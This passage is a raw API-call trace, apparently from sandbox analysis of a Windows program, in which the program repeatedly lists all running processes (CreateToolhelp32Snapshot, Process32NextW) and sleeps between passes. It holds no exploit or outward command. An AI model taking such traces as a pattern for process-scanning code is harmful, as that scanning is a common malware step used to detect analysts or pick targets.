lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.618] CloseHandle (hObject=0xc4) returned 1 [0147.618] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.623] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0147.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0147.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0147.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0147.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0147.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0147.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0147.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0147.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0147.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0147.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0147.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0147.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0147.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0147.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0147.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0147.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0147.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0147.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0147.735] CloseHandle (hObject=0xbc) returned 1 [0147.736] Sleep (dwMilliseconds=0x12c) [0148.066] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.072] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 